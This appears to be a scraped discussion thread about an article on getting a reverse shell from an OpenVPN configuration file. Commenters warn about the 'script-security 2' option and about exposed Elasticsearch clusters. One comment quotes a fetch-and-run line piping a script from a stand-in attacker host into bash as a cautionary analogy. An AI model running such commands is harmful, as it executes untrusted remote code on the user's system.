Reverse Shell from an OpenVPN Configuration File
medium.com
medium.com
https://github.com/Security-Onion-Solutions/security-onion/w...
Your internet service provider is one of these parties. With VPN, you have a large choice of whom to trust and an easy option to switch.
I pay my ISP a significant amount each month, and I expect in return that they’re at least not going to inject extra JavaScript into all my browsing. A free VPN on the other hand? They’ve gotta make money, I’ll be things get shady real fast.
Treat OpenVPN config files the same way you'd treat a bash script you pulled from the net and were thinking of running as root. IE: read the damn thing first.
I recently developed an ElasticSearch plugin and I was positively surprised at the security model: plugins have to declare the permissions they intend to use and the user has to explicitly grant them when installing the plugin.
Amazon even has an article about securing ES
https://aws.amazon.com/blogs/security/how-to-control-access-...
EDIT: https://www.zdnet.com/article/elasticsearch-ransomware-attac...
> Elasticsearch was never meant to be wide-open to internet users. Elastic, the company behind Elasticsearch, explained all this in 2013. This post is filled with such red-letter warnings as "Elasticsearch has no concept of a user." Essentially, anyone that can send arbitrary requests to your cluster is a "super user."
By setting "script-security 2" in the config file, you are opting in to arbitrary script execution, and the binary even helpfully warns you about it. This doesn't happen by default.
(Of course, you could say "well it was already in the config, I didn't put it there", but that's akin to "curl evil.example.com/pwnme.sh | bash # I didn't inspect the file, not my problem what it contains")
I've emailed friends scripts with ssh keys that were: "Click and open a tunnel to my server", I could then help them (i.e. to save images from their raspberry pi camera directly to webdav. Or I could work on friend's raspberry pi proximity sensor in his water tank...) Very handy, very risky.
Not sure if other macOS or some Linux distro has anything similar.
A text file used for configuration should not be an executable.